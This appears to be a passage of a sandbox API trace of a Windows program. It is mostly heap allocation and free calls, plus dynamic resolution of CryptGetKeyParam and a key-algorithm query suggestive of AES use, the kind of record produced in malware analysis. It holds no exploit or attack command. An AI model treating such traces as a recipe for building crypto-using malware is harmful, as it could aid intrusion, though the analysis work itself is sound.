RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0125.583] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0125.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0125.584] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0125.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0125.584] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0125.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0125.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0125.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0125.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.585] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0125.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0125.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.586] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0125.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0125.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0125.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0125.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.587] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0125.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0125.587] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0125.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0125.587] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0125.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0125.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0125.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0125.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0125.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0125.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0125.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0125.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0125.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0125.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0125.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0125.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0125.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0125.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0125.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0125.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0125.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0125.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0125.592] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0125.592] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e2750, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2750*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0125.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 